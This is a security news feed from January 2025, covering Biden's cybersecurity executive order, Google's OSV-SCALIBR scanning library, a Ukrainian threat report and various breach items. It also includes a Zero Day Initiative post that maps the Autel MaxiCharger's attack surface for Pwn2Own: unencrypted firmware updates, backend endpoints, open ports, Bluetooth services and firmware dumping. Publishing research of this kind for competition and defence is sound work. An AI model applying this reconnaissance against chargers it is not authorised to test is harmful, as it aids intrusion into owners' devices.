Biden’s order instructs the federal government to “adopt proven security practices from industry — to include in identity and access management — in order to improve visibility of security threats across networks and strengthen cloud security.”

Pilot tests for commercial phishing-resistant standards such as WebAuthn are among the requirements for federal agencies, along with post-quantum cryptography (PQC) key establishment (or a hybrid that includes a PQC algorithm) “as soon as practicable upon support being provided by network security products and services already deployed in their network architectures.” Secure management of access tokens and cryptographic keys used by cloud service providers is another requirement.

CISA will also lead development of “the technical capability to gain timely access to required data” from agencies’ EDR solutions and security operation centers to enable rapid threat hunting.

BGP security shortcomings would be addressed with requirements for ISPs to deploy Internet routing security technologies such as Route Origin Authorizations, Route Origin Validation, route leak mitigation and source address validation.

Encryption would be required for DNS traffic, email, video conferencing and instant messaging.

Digital Identities 'Encouraged' by Biden Order

The order also would “strongly encourage the acceptance of digital identity documents to access public benefits programs that require identity verification, so long as it is done in a manner that preserves broad program access for vulnerable populations and supports the principles of privacy, data minimization, and interoperability.” Agencies would work with states to develop and issue mobile driver’s licenses to meet that goal, along with identity fraud reporting.

AI Cybersecurity Innovation and Controls

AI “has the potential to transform cyber defense by rapidly identifying new vulnerabilities, increasing the scale of threat detection techniques, and automating cyber defense,” the Biden order states. “The Federal Government must accelerate the development and deployment of AI, explore ways to improve the cybersecurity of critical infrastructure using AI, and accelerate research at the intersection of AI and cybersecurity.”

Those efforts would begin with a pilot program “on the use of AI to enhance cyber defense of critical infrastructure in the energy sector.” That pilot program may include vulnerability detection, automated patch management, and “the identification and categorization of anomalous and malicious activity across information technology (IT) or operational technology systems.” That would be followed by a Department of Defense program “to use advanced AI models for cyber defense.”

The order also asks agencies to prioritize research on the following topics:
• human-AI interaction methods to assist defensive cyber analysis
• AI coding security assistance, including security of AI-generated code
• methods for designing secure AI systems
• methods for “prevention, response, remediation, and recovery of cyber incidents involving AI systems.”

Secure Architecture a Long-Term Goal

One of the few long-term goals in the order is a requirement that within three years, the Director of OMB would issue guidance “to address critical risks and adapt modern practices and architectures across Federal information systems and networks.” That includes, at a minimum, zero trust architectures, EDR capabilities, encryption, network segmentation, and phishing-resistant multi-factor authentication.

One last requirement calls for agencies to assess “risks to mission-essential functions presented by concentration of IT vendors and services.”

The Biden order applies to federal civilian agencies but not National Security Systems (NSS). However, NSS and “debilitating impact systems” would also be required to develop requirements “that are consistent with the requirements set forth in this order.”
by The Cyber Express
2025-01-16 19:15:38
Find the helpers
Bill discusses how to find 'the helpers' and the importance of knowledge sharing. Plus, there's a lot to talk about in our latest vulnerability roundup.
by Cisco Talos Blog
2025-01-16 19:00:00
How to protect your site from subdomain takeover
Subdomain takeover is a serious risk for organizations with a large online presence (which is a lot of businesses in 2025!). A domain name is the starting point of your company’s online identity, encompassing the main and subsidiary websites—serving as the organization’s business card, storefront, and a central hub for commercial activities. For SaaS providers […] The post How to protect your site from subdomain takeover appeared first on Outpost24.
by Outpost24
2025-01-16 18:28:07
Resurrecting Shift-Left With Human-in-the-loop AI

Alex Rice, Thu, 01/16/2025 - 10:28

What’s Needed for Secure by Design Success

We spent years understanding why “shift-left” controls fail, in order to identify the principles needed for them to succeed. Success starts with a developer-first foundation and a discipline to eliminate work rather than create it.

The Developer-first Application Security Foundation

To guide developers to write secure code, they need to be armed with actionable information. In fact, use “actionable” interchangeably with “useful.”

The key ingredients for actionability are context, speed, and low-noise output. It needs to be focused, fast, and understand what’s being analyzed. Static Application Security Testing (SAST) and Software Composition Analysis (SCA) tools are fast but fall short on context and noise. The problem is how often they’re not right—bombarding developers with false positives and duplicate warnings.

The source of information needs to continuously learn. A process is doomed to failure if developers need to constantly explain their work and escalate exceptions. Developer security tools need to listen, watch, and adapt without intervention. If application security listens to developers and provides value, developers respond by listening and learning back.

When application security activates in development, it should be non-blocking. Blocking mechanisms bring development—and everything else—to a halt. They incentivize creative bypasses, not secure code. Applying preventative safeguards is important, but overburdening developers because they work on the pre-production side of the SDLC is hardly a balanced defense-in-depth strategy.

Finally, security can’t just make noise at developers. Remediation needs to be part of the solution. To address issues that arise, there needs to be interactive support throughout the lifecycle.

Where “Shift Left” Went Wrong

Efforts to introduce security testing earlier in the SDLC usually begin with applying SAST (and IAST, DAST, SCA, RASP, etc.) scanners. These are fast and, because of broad compatibility with most programming languages, theoretically scalable. The problem is the work it takes to prove their output is right or wrong, leading to compounding backlogs. And upon examination, they’re often wrong, leading to security policies developers don’t trust. It’s here where application security in development stalls: trying to make a dysfunctional policy work (as security debt grows).

None of this is to say security code scanners aren’t powerful and valuable. Their maintainers, whose work has done the world a great service, never claimed for them to stand as a single strategy. “Shift left” failed developers as a well-intended, unspoken hope that there’d be an easy fix to a hard problem.

The Future of Developer Security with AI

Scanners are limited when it comes to things like understanding massive legacy codebases, identifying misuse of functionality in microservice architectures, and finding flaws related to code not written. Here, AI shines and the future looks bright. Models, trained on large corpora of training data, are capable of analyzing entire codebases. Secure code systems can flag areas that deviate from normal patterns. Great news for developers and security engineers who have carried 100% of the manual secure code review burden for years.

Is AI alone the solution to right what “shift left” got wrong?

Embarking on these opportunities made possible with AI, it’s important to remember technology is a tool, not a replacement for invaluable human expertise.

Human-AI Collaboration

Rethinking “shift-left” security strategy by incorporating AI technology is exciting, but warrants safe and responsible exploration. Execution of deployment requires human-in-the-loop (HITL) oversight as a governing principle. Conventionally, the objectives of a HITL methodology are to improve the models they oversee—ensuring AI systems are accurate, robust, ethical, adaptable, and aligned with real-world goals.

Let’s challenge conventional thinking.

Instead of prioritizing the efficacy of AI systems, what if human-in-the-loop oversight priorities begin and end with helping a developer write secure code? What if human experts can not only categorize model output as “right” or “wrong,” but expand on what’s “right” so it’s actionable with all of the context details taken into account? What if they’re a teammate who can help a developer on a problem-solving journey of taking action to remediate?

Let’s Resurrect Shift-Left Security

Check out the on-demand webinar during which we discuss how a human-AI collaborative approach transforms security from a dreaded blocker into a powerful enabler of development velocity.

Broken Security Promises: How Human-AI Collaboration Rebuilds Developer Trust (originally aired on Jan. 16, 2025 @ 12pm ET)

Stay tuned for more insights into how HackerOne is working with dev teams to reinvent secure development together.

Let's explore how human-in-the-loop AI can help implement successful secure-by-design.
by HackerOne
2025-01-16 18:09:54
Extending Falco for Box
Box, Inc. specialises in developing and marketing cloud-based content management, collaboration, and file-sharing tools for businesses. While Box’s services are... The post Extending Falco for Box appeared first on Sysdig.
by Sysdig
2025-01-16 17:56:45
Updated Response to CISA Advisory (AA23-136A): #StopRansomware: BianLian Ransomware Group
AttackIQ has released an updated attack graph in response to the recently revised CISA Advisory (AA23-136A) that disseminates known BianLian ransomware group Indicators of Compromise (IOCs) and Tactics, Techniques, and Procedures (TTPs) identified through the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA) and the Australian Cyber Security Centre (ACSC) investigations. The post Updated Response to CISA Advisory (AA23-136A): #StopRansomware: BianLian Ransomware Group appeared first on AttackIQ.
by AttackIQ
2025-01-16 17:55:00
Ready to Simplify Trust Management? Join Free Webinar to See DigiCert ONE in Action
The digital world is exploding. IoT devices are multiplying like rabbits, certificates are piling up faster than you can count, and compliance requirements are tightening by the day. Keeping up with it all can feel like trying to juggle chainsaws while riding a unicycle. Traditional trust management? Forget it. It's simply not built for today's fast-paced, hybrid environments. You need a
by The Hacker News
2025-01-16 17:48:07
White House Executive Order: Strengthening and Promoting Innovation in the Nation’s Cybersecurity
Get details on this new cybersecurity Executive Order and its implications.
by Legit Security
2025-01-16 17:42:13
Agentic AI Paves the Way for Sophisticated Cyberattacks
Gartner analysts discuss how agentic AI will transform business operations by 2028, while also raising the risk of cyberattacks.
by ITPro Today
2025-01-16 17:00:02
Gootloader inside out
Open-source intelligence reveals the server-side code of this pernicious SEO-driven malware - without needing a lawyer afterward
by Sophos News
2025-01-16 17:00:00
The $10 Cyber Threat Responsible for the Biggest Breaches of 2024
You can tell the story of the current state of stolen credential-based attacks in three numbers: Stolen credentials were the #1 attacker action in 2023/24, and the breach vector for 80% of web app attacks. (Source: Verizon). Cybersecurity budgets grew again in 2024, with organizations now spending almost $1,100 per user (Source: Forrester). Stolen credentials on criminal forums cost as
by The Hacker News
2025-01-16 16:53:00
New UEFI Secure Boot Vulnerability Could Allow Attackers to Load Malicious Bootkits
Details have emerged about a now-patched security vulnerability that could allow a bypass of the Secure Boot mechanism in Unified Extensible Firmware Interface (UEFI) systems. The vulnerability, assigned the CVE identifier CVE-2024-7344 (CVSS score: 6.7), resides in a UEFI application signed by Microsoft's "Microsoft Corporation UEFI CA 2011" third-party UEFI certificate, according to a new
by The Hacker News
2025-01-16 16:50:00
Researchers Find Exploit Allowing NTLMv1 Despite Active Directory Restrictions
Cybersecurity researchers have found that the Microsoft Active Directory Group Policy that's designed to disable NT LAN Manager (NTLM) v1 can be trivially bypassed by a misconfiguration. "A simple misconfiguration in on-premise applications can override the Group Policy, effectively negating the Group Policy designed to stop NTLMv1 authentications," Silverfort researcher Dor Segal said in a
by The Hacker News
2025-01-16 16:45:00
Hackers Hide Malware in Images to Deploy VIP Keylogger and 0bj3ctivity Stealer
Threat actors have been observed concealing malicious code in images to deliver malware such as VIP Keylogger and 0bj3ctivity Stealer as part of separate campaigns. "In both campaigns, attackers hid malicious code in images they uploaded to archive[.]org, a file-hosting website, and used the same .NET loader to install their final payloads," HP Wolf Security said in its Threat Insights Report
by The Hacker News
2025-01-16 16:38:42
What Lies Ahead for the Global BPO Sector in 2025?
Businesses are turning to innovative BPO strategies powered by AI, automation, and data-driven insights to streamline operations, reduce costs, and deliver personalized customer experiences in 2025.
by ITPro Today
2025-01-16 16:17:45
Essential PowerShell Commands: A Cheat Sheet for Beginners
This post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.

Introduction to PowerShell

What Is PowerShell?

PowerShell is a powerful command-line shell that supports scripting languages and provides tools for managing computer resources locally and remotely.

Benefits of PowerShell for Windows Administration

Windows PowerShell commands enable automation of repetitive tasks such as managing users, services, files, or scripts. PowerShell can also be used for managing … Continued
by Netwrix
2025-01-16 16:11:41
Introduction to PowerShell Invoke-Command
This post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.

The Invoke-Command cmdlet in PowerShell enables IT admins to execute commands and scripts on remote machines, and even to redirect the output of those remote scripts to their own console. As a result, they can manage multiple machines from a central location. Key use cases include: Invoke-Command offers all of the following valuable capabilities: Benefits … Continued
by Netwrix
2025-01-16 16:03:00
Russia’s Star Blizzard pivots to WhatsApp in spear-phishing campaign
by ComputerWeekly
2025-01-16 16:00:00
Reviewing the Attack Surface of the Autel MaxiCharger: Part Two

Previously, we covered the internals of the Autel MaxiCharger where we highlighted each of the main components. In this post, we aim to outline the attack surface of the MaxiCharger in the hopes of providing inspiration for vulnerability research.

All information has been obtained through reverse engineering, experimenting, and combing through the Autel MaxiCharger manual (PDF).

At the time of writing the following software versions were applicable:
• Autel Charge app v3.0.7
• Autel Config app v2.1.0
• Autel MaxiCharger modules:
  • Charge Control v1.36.00
  • Power Control v1.21.00
  • LCD Control v0.99.31
  • LCD Information v0.99.08
  • LCD Resources v0.99.08
  • LCD Languages v0.04.04

Mobile Applications

Autel has published two mobile applications for both Android and iOS. The main app is called Autel Charge and contains functionality intended for end users. Some of the features include:
• Defining charging schedules
• Load balancing
• Providing Wi-Fi credentials for the charger to use
• Forcing firmware updates
• OCPP server selection (including custom servers)
• Current limiting
• Finding other chargers on a map
• Checking charger version information

Upon loading the app on a rooted Android device a superuser request can be seen. This was unexpected and points towards the app employing anti-reversing measures. Denying the request loads the app normally.

Figure 1: Autel Charge superuser request

After denying the superuser request a new Autel account can be created using an email address.

The second app is named Autel Config and allows installers / technicians to configure chargers and manage tickets. Unlike the Autel Charge app, there is no option to register for an account, and providing Autel Charge account credentials doesn't work. This suggests that installers / technicians have some other way of obtaining valid credentials.

Further research into these apps could be valuable to better understand how the apps and charger communicate.

Network Traffic Analysis

Using the Autel Charge app, the MaxiCharger was configured to connect to a researcher-controlled Wi-Fi network in order to monitor the network traffic. The app and charger were then left idling whilst the traffic was captured. A few DNS requests were sent out from the charger (192.168.200.66) for Autel related infrastructure.

Figure 2: Charger DNS queries

The first query was for gateway-eneprodus.autel.com which is an alias of eneprodus-alb-internet-2014464356.us-west-2.elb.amazonaws.com. This resolved to the following IP addresses (shown in the order received):
• 54.185.127.160
• 52.36.153.97
• 44.240.206.177
• 34.215.58.124

Straight after the first DNS query response a TLS session was set up and encrypted data was sent by the charger on port 443 to 54.185.127.160. Data was sent back and forth between the charger and server a few times before another DNS query was sent. The charger issued another query for gateway-eneprodus.autel.com which, as before, is an alias and returned the same IP addresses but in a different order, presumably due to load balancing. This time the DNS query returned the IP addresses:
• 34.215.58.124
• 44.240.206.177
• 54.185.127.160
• 52.36.153.97

Like previously, the charger used the first IP address that was returned, but this time no TLS session was set up. Plain HTTP was used.

Figure 3: HTTP traffic

Looking a bit closer showed the charger periodically sending log data to the Autel server. The server always responded with JSON that had a null data value, a 200 code value and a message value of OK.

Figure 4: HTTP POST traffic

After a while the charger made another DNS request for gateway-eneprodus.autel.com; this time the 44.240.206.177 IP address was returned first. The charger then sent an HTTP POST to /api/app-version-manager/version/upgrade/ota with device-related details such as the serial number and current firmware version. The server responded with JSON containing firmware update related information including a URL to download the latest version.

Figure 5: HTTP firmware related traffic

The charger then proceeded to send a DNS request for s3.us-west-2.amazonaws.com and directly downloaded the firmware update over HTTP. The same pattern was observed multiple times as the device downloaded firmware updates for each of its modules. A list of these modules and their versions can be viewed in the Autel Charge app by navigating to the Charger Info page.

Figure 6: MaxiCharger module versions

After the firmware was updated and the charger rebooted, no further HTTP traffic was observed to the logging or firmware update endpoint; instead only HTTPS was used.

Port scanning the charger over Wi-Fi showed no open TCP or UDP ports; however, UDP ports 6000 and 6666 appear to be listening over the Ethernet interface. The Ethernet interface is a valid target for the competition, so these 2 listening services may be worth researching further.

Bluetooth Low Energy

By default the MaxiCharger uses the device serial number as the device name when advertising over Bluetooth. Once connected there are 4 available services that offer a total of 14 characteristics. Autel Charge uses these endpoints to communicate with the charger. A dump of each service and associated characteristics is shown below. Further research into Autel Charge and Autel Config will likely assist in understanding the Bluetooth services better.

Firmware

As mentioned in the previous blog, the main microcontroller has readout protection enabled; however, this can be bypassed using techniques covered in Jonathan Andersson's and Thanos Kaliyanakis' Blackhat EU talk. Keep an eye out for future blog posts that will cover these techniques. One of which doesn't require glitching!

The main firmware can also be acquired by sniffing the charger update process (as described in the Network Traffic Analysis section) or by reversing the app to figure out the download URLs. The firmware of the ESP32 WROOM 32D module can be dumped using the standard esptool.py from Espressif. During research it was noted that esptool.py would sometimes fail to dump the full firmware image. To mitigate this the firmware can be dumped in smaller chunks and then stitched back together into a single blob.

Other Potential Attack Surfaces

There are a few other attack surfaces that are considered in scope and are worth mentioning. One of these is the undocumented USB C port that can be found behind a small panel on the side of the unit. There is no publicly available information about what this USB port is used for.

Also, next to the USB port is the SIM card tray. Attacks that utilize a SIM card are also considered to be in scope.

And finally, there is the RFID (NFC) reader.

Summary

Hopefully this blog post provides enough information to kickstart vulnerability research against the Autel MaxiCharger. We are looking forward to Pwn2Own Automotive again in Tokyo in January 2025 at Automotive World, and we will see if IVI vendors have improved their product security. Don’t wait until the last minute to ask questions and register! We hope to see you there.

You can find me on Twitter at @ByteInsight, and follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.
by Zero Day Initiative Blog
2025-01-16 15:47:22
The best password manager for families in 2025: Expert tested and reviewed
The best password managers provide security, privacy, and ease of use for a reasonable price. We tested the best ones to help you find what's best for your family.
by ZDNET Security
2025-01-16 15:10:52
Avery had credit card skimmer stuck on its site for months
Avery has confirmed its website was compromised by a credit card skimmer that potentially affected over 60,000 customers.
by Malwarebytes Labs
2025-01-16 15:04:45
First Ever Magic Quadrant™ for Email Security Platforms by Gartner®
In cybersecurity, email has always been a critical concern. However, we feel the new 2024 Gartner® Magic Quadrant for Email Security Platforms™ has signaled a shift in how we approach email protection.
by KnowBe4
2025-01-16 15:00:00
One Active Directory Account Can Be Your Best Early Warning
Here we go again, discussing Active Directory, hacking, and detection engineering. tl;dr: One AD account can provide you with three detections that if implemented properly will catch common adversarial activities […] The post One Active Directory Account Can Be Your Best Early Warning appeared first on Black Hills Information Security.
by Black Hills Information Security
2025-01-16 15:00:00
Strategic Approaches to Threat Detection, Investigation & Response
By staying vigilant, agile, and prepared, organizations can turn TDIR from a defensive strategy into a proactive enabler of security and operational excellence.
by Dark Reading
2025-01-16 14:30:49
Wolf Haldenstein Data Breach Exposed 3.5 Million Americans
Wolf Haldenstein Adler Freeman & Herz LLP, a prominent U.S. law firm, has disclosed a data breach affecting nearly 3.45 million individuals. The breach, caused by an external hacking incident, compromised sensitive personal and medical information. The firm first detected suspicious network activity on December 13, 2023, and took immediate steps to secure its systems. … The post Wolf Haldenstein Data Breach Exposed 3.5 Million Americans appeared first on CyberInsider.
by Cyber Insider
2025-01-16 14:29:59
Risk, Reputational Scores Enjoy Mixed Success as Security Tools
Part predictive analysis, part intuition, risk and reputation services are imperfect instruments at best — and better than nothing for most organizations and insurers.
by Dark Reading
2025-01-16 14:10:00
The SOC case files: XDR’s automated threat response delivers high speed protection to an employee in the cloud
An employee at a telecommunications company connected as usual to their cloud account. They then appeared to travel a distance of 361 km, roughly 225 miles, at nearly twice the speed of sound before logging in again.
by Barracuda
2025-01-16 14:06:00
OSV-SCALIBR: A library for Software Composition Analysis

Posted by Erik Varga, Vulnerability Management, and Rex Pan, Open Source Security Team

In December 2022, we announced OSV-Scanner, a tool to enable developers to easily scan for vulnerabilities in their open source dependencies. Together with the open source community, we’ve continued to build this tool, adding remediation features, as well as expanding ecosystem support to 11 programming languages and 20 package manager formats.

Today, we’re excited to release OSV-SCALIBR (Software Composition Analysis LIBRary), an extensible library for SCA and file system scanning. OSV-SCALIBR combines Google’s internal vulnerability management expertise into one scanning library with significant new capabilities such as:
• SCA for installed packages, standalone binaries, as well as source code
• OS package scanning on Linux (COS, Debian, Ubuntu, RHEL, and much more), Windows, and Mac
• Artifact and lockfile scanning in major language ecosystems (Go, Java, Javascript, Python, Ruby, and much more)
• Vulnerability scanning tools such as weak credential detectors for Linux, Windows, and Mac
• SBOM generation in SPDX and CycloneDX, the two most popular document formats
• Optimization for on-host scanning of resource constrained environments where performance and low resource consumption is critical

OSV-SCALIBR is now the primary SCA engine used within Google for live hosts, code repos, and containers. It’s been used and tested extensively across many different products and internal tools to help generate SBOMs, find vulnerabilities, and help protect our users’ data at Google scale.

We offer OSV-SCALIBR primarily as an open source Go library today, and we're working on adding its new capabilities into OSV-Scanner as the primary CLI interface.

Using OSV-SCALIBR as a library

All of OSV-SCALIBR's capabilities are modularized into plugins for software extraction and vulnerability detection which are very simple to expand.

You can use OSV-SCALIBR as a library to:

1. Generate SBOMs from the build artifacts and code repos on your live host:

    import (
        "context"

        "github.com/google/osv-scalibr"
        "github.com/google/osv-scalibr/converter"
        "github.com/google/osv-scalibr/extractor/filesystem/list"
        "github.com/google/osv-scalibr/fs"
        "github.com/google/osv-scalibr/plugin"
        spdx "github.com/spdx/tools-golang/spdx/v2/v2_3"
    )

    func GenSBOM(ctx context.Context) *spdx.Document {
        // Declare the host capabilities so only compatible extractors are enabled.
        capab := &plugin.Capabilities{OS: plugin.OSLinux}
        cfg := &scalibr.ScanConfig{
            ScanRoots:            fs.RealFSScanRoots("/"),
            FilesystemExtractors: list.FromCapabilities(capab),
            Capabilities:         capab,
        }
        result := scalibr.New().Scan(ctx, cfg)
        // Convert the scan result into an SPDX 2.3 document.
        return converter.ToSPDX23(result, converter.SPDXConfig{})
    }

2. Scan a git repo for SBOMs:

Simply replace "/" with the path to your git repo. Also take a look at the various language extractors to enable for code scanning.

3. Scan a remote container for SBOMs:

Replace the scan config from the above code snippet with

    import (
        ...
        "github.com/google/go-containerregistry/pkg/authn"
        "github.com/google/go-containerregistry/pkg/v1/remote"
        "github.com/google/osv-scalibr/artifact/image"
        ...
    )
    ...
    // Pull the image from the registry and expose its layers as a filesystem.
    filesys, _ := image.NewFromRemoteName(
        "alpine:latest",
        remote.WithAuthFromKeychain(authn.DefaultKeychain),
    )
    cfg := &scalibr.ScanConfig{
        ScanRoots: []*fs.ScanRoot{{FS: filesys}},
        ...
    }

4. Find vulnerabilities on your filesystem or a remote container:

Extract the PURLs from the SCALIBR inventory results from the previous steps:

    import (
        ...
        "github.com/google/osv-scalibr/converter"
        ...
    )
    ...
    result := scalibr.New().Scan(ctx, cfg)
    // Print one package URL per inventory entry found by the extractors.
    for _, i := range result.Inventories {
        fmt.Println(converter.ToPURL(i))
    }

And send them to osv.dev, e.g.

    $ curl -d '{"package": {"purl": "pkg:npm/dojo@1.2.3"}}' "https://api.osv.dev/v1/query"

See the usage docs for more details.

OSV-Scanner + OSV-SCALIBR

Users looking for an out-of-the-box vulnerability scanning CLI tool should check out OSV-Scanner, which already provides comprehensive language package scanning capabilities using much of the same extraction as OSV-SCALIBR. Some of OSV-SCALIBR’s capabilities are not yet available in OSV-Scanner, but we’re currently working on integrating OSV-SCALIBR more deeply into OSV-Scanner. This will make more and more of OSV-SCALIBR’s capabilities available in OSV-Scanner in the next few months, including installed package extraction, weak credentials scanning, SBOM generation, and more.

Look out soon for an announcement of OSV-Scanner V2 with many of these new features available. OSV-Scanner will become the primary frontend to the OSV-SCALIBR library for users who require a CLI interface. Existing users of OSV-Scanner can continue to use the tool the same way, with backwards compatibility maintained for all existing use cases. For installation and usage instructions, have a look at OSV-Scanner’s documentation here.

What’s next

In addition to making all of OSV-SCALIBR’s features available in OSV-Scanner, we're also working on additional new capabilities. Here are some of the things you can expect:
• Support for more OS and language ecosystems, both for regular extraction and for Guided Remediation
• Layer attribution and base image identification for container scanning
• Reachability analysis to reduce false positive vulnerability matches
• More vulnerability and misconfiguration detectors for Windows
• More weak credentials detectors

We hope that this library helps developers and organizations to secure their software and encourages the open source community to contribute back by sharing new plugins on top of OSV-SCALIBR.

If you have any questions or if you would like to contribute, don't hesitate to reach out to us at osv-discuss@google.com or by posting an issue in our issue tracker.
by Google Security Blog
2025-01-16 14:01:17
Clop ransomware gang names dozens of victims hit by Cleo mass-hack, but several firms dispute breachesThe Russia-linked ransomware group is threatening to leak data stolen from almost 60 Cleo Software customers if ransoms aren't paid.
by TechCrunch
2025-01-16 14:00:10
More From Our Main Blog: New Possibilities with Purple AI | Third-Party Log Sources & Multilingual Question SupportLearn about the all-new third-party log sources and multilingual question support features just released for SentinelOne's Purple AI. The post New Possibilities with Purple AI | Third-Party Log Sources & Multilingual Question Support appeared first on SentinelOne.
by SentinelOne
2025-01-16 14:00:00
Your KnowBe4 Fresh Content Updates from December 2024Check out the 52 new pieces of training content added in December, alongside the always fresh content update highlights, new features and events.
by KnowBe4
2025-01-16 14:00:00
The current state of ransomware: Weaponizing disclosure rules and moreAs we near the end of 2024, ransomware remains a dominant and evolving threat against any organization. Cyber criminals are more sophisticated and creative than ever. They integrate new technologies, leverage geopolitical tensions and even use legal regulations to their advantage. What once seemed like a disruptive but relatively straightforward crime has evolved into a […] The post The current state of ransomware: Weaponizing disclosure rules and more appeared first on Security Intelligence.
by Security Intelligence
2025-01-16 13:23:17
Government Sector Bears the Brunt of Cyberattacks in Ukraine: Report

Overview
Ukraine's fight against cyberthreats has reached new heights, with its top cybersecurity agency releasing the 2024 annual cyberthreat landscape report detailing its efforts to protect critical infrastructure and government systems. The report, prepared by the State Cyber Defense Center under the State Service for Special Communications and Information Protection, outlines key findings, incident statistics, and the strategies employed to counteract persistent cyber threats.

Key Findings
Ukraine processed 3 million security events in 2024, a reflection of the heightened activity in its cyber domain. Of these, over 1,000 incidents were confirmed as direct cyberthreats. The year saw a surge in advanced persistent threats (APTs) and state-sponsored cyber espionage campaigns, with attackers leveraging legitimate services to obfuscate their malicious activities.
- Malware dominance: Over 58% of incidents involved malicious software, ranging from ransomware to spyware designed for prolonged infiltration. These attacks targeted data exfiltration and operational disruption.
- Sectoral breakdown: Government agencies accounted for 90% of reported incidents, making them the primary target for the year. The energy sector, critical to Ukraine's resilience, and the defense sector, pivotal in ongoing geopolitical conflicts, also faced significant threats.
- Primary attack vectors: Phishing campaigns remained the predominant method of attack. Threat actors exploited spear-phishing emails laden with malicious attachments or links, leveraging human error as an entry point.

The Major Threat Clusters
Ukraine identified three major threat actor clusters, each with distinct methodologies and objectives, that remained most active over the past year:

UAC-0010 (Gamaredon/Trident Ursa)
- Activity: Conducted over 270 documented incidents in 2024.
- Tactics: Utilized tailored malware delivery mechanisms, including infected removable media and phishing emails.
- Targets: Government institutions, military organizations, and diplomatic entities.
- Objective: Cyber espionage aimed at gathering intelligence on Ukraine's governance and defense.

UAC-0006
- Activity: Responsible for 174 attacks, particularly in the financial sector.
- Tactics: Employed SmokeLoader malware to infiltrate systems and extract sensitive data.
- Objective: Financial gain through data theft and subsequent ransom demands.

UAC-0050
- Activity: Linked to 99 incidents with a mix of espionage and sabotage.
- Tactics: Relied heavily on phishing and malware propagation via compromised email accounts.
- Objective: Espionage with a secondary focus on spreading disinformation.

Advanced Tools and Techniques
To combat increasingly sophisticated threats, Ukraine's SOC deployed a range of advanced tools and methodologies:
- Network Detection and Response (NDR): SOC teams monitored anomalies in traffic patterns across 69 sensors strategically placed in critical networks. These sensors facilitated early detection of intrusions.
- Endpoint Detection and Response (EDR): Secured over 28,000 devices, providing a critical layer of defense against endpoint-based attacks.
- Attack Surface Management (ASM): Regular scans of over 1,200 assets enabled the identification and mitigation of vulnerabilities before they could be exploited.
- SOAR and AI integration: The integration of Security Orchestration, Automation, and Response (SOAR) with AI algorithms streamlined incident response processes, significantly reducing detection-to-remediation times.

Sector-Specific Insights
The agency's analysis provides a granular view of the sectors most impacted by cyber threats:
- Government agencies: As the backbone of Ukraine's operational and strategic initiatives, government networks faced relentless attacks. Over 90% of incidents were concentrated here, ranging from attempts to steal classified information to disruptions of communication systems.
- Energy sector: With Ukraine's energy infrastructure being a critical target, adversaries focused on disrupting power grids and supply chains, aiming to weaken national stability.
- Defense sector: Sophisticated attacks aimed to infiltrate military communications and logistics systems, compromising national security.

Recommendations for Enhanced Cyber Resilience
Ukraine's cyberthreat landscape calls for a multi-layered approach to cybersecurity, advocating the following measures:
- Regular software updates: Ensure that all systems, software, and firmware are updated promptly to address known vulnerabilities.
- Advanced email security: Deploy filters to detect and block phishing attempts, and train employees to recognize suspicious communications.
- Comprehensive endpoint protection: Use advanced antivirus and EDR solutions to secure devices against malware and unauthorized access.
- Network segmentation: Isolate critical systems from less secure areas to limit the scope of potential breaches.
- Multi-factor authentication (MFA): Enforce MFA across all user accounts to strengthen identity verification.
- Incident response plans: Develop and regularly test robust incident response protocols to ensure rapid recovery from cyber events.
- Continuous monitoring: Leverage SIEM tools and log analysis to detect and respond to anomalies in real time.

The Path Forward
Ukraine's annual cyberthreat landscape report for 2024 shows the dynamic and persistent nature of the cyberthreats the country faces. The integration of advanced technologies and proactive collaboration with international allies has significantly enhanced the nation's cyber defense capabilities. However, the evolving tactics of adversaries demand an equally adaptive and forward-looking approach. As Ukraine continues to navigate its geopolitical challenges, the role of cybersecurity in safeguarding national sovereignty and infrastructure remains paramount. By fostering a culture of resilience and collaboration, Ukraine is setting an example for global cybersecurity efforts, proving that even under relentless attack, robust defenses can prevail.

References:
https://scpc.gov.ua/api/files/72e13298-4d02-40bf-b436-46d927c88006
https://www.cip.gov.ua/ua/news/sistema-viyavlennya-vrazlivostei-i-reaguvannya-na-kiberincidenti-ta-kiberataki-dckz-dopomogla-viyaviti-ta-opracyuvati-1042-kiberincidenti-u-2024-roci

The post Government Sector Bears the Brunt of Cyberattacks in Ukraine: Report appeared first on Cyble.
by CYBLE
2025-01-16 12:15:00
Python-Based Malware Powers RansomHub Ransomware to Exploit Network FlawsCybersecurity researchers have detailed an attack that involved a threat actor utilizing a Python-based backdoor to maintain persistent access to compromised endpoints and then leveraged this access to deploy the RansomHub ransomware throughout the target network. According to GuidePoint Security, initial access is said to have been facilitated by means of a JavaScript malware downloaded named
by The Hacker News
2025-01-16 12:09:00
Researcher Uncovers Critical Flaws in Multiple Versions of Ivanti Endpoint ManagerIvanti has rolled out security updates to address several security flaws impacting Avalanche, Application Control Engine, and Endpoint Manager (EPM), including four critical bugs that could lead to information disclosure. All the four critical security flaws, rated 9.8 out of 10.0 on the CVSS scale, are rooted in EPM, and concern instances of absolute path traversal that allow a remote
by The Hacker News
2025-01-16 11:37:51
GDPR Complaints Filed Against TikTok, Xiaomi, Over Data TransfersEuropean privacy advocacy group noyb has filed six General Data Protection Regulation (GDPR) complaints against major Chinese tech companies, including TikTok, AliExpress, SHEIN, Temu, WeChat, and Xiaomi, for allegedly transferring Europeans' personal data to China in violation of EU law. The complaints, lodged in five different countries, argue that China's authoritarian surveillance state lacks adequate … The post GDPR Complaints Filed Against TikTok, Xiaomi, Over Data Transfers appeared first on CyberInsider.
by Cyber Insider
2025-01-16 11:30:00
7 reasons to shorten SSL certificate validity periodsShorter SSL certificate validity periods enhance digital security by reducing risks like private key compromise, misissuance, and revocation delays. They align certificate ownership with domain control, encourage crypto agility, and address limitations of current revocation methods. Short validity periods also promote automation, streamline renewal processes, and future-proof systems against evolving cybersecurity challenges. While increased renewal frequency poses challenges, adopting automated solutions can mitigate risks and ensure seamless management.
by Sectigo
2025-01-16 11:30:00
Biden's Cyber Ambassador Urges Trump Not to Cede Ground to Russia and China in Global Tech FightNathaniel Fick, the ambassador for cyberspace and digital policy, has led US tech diplomacy amid a rising tide of pressure from authoritarian regimes. Will the Trump administration undo that work?
by WIRED Security News
2025-01-16 11:21:47
6 Strategic Innovations Transforming the Fintech IndustryTechnology is changing the global economy, and fintech companies are at the backbone of this transformation. To keep…
by Hackread
2025-01-16 11:02:58
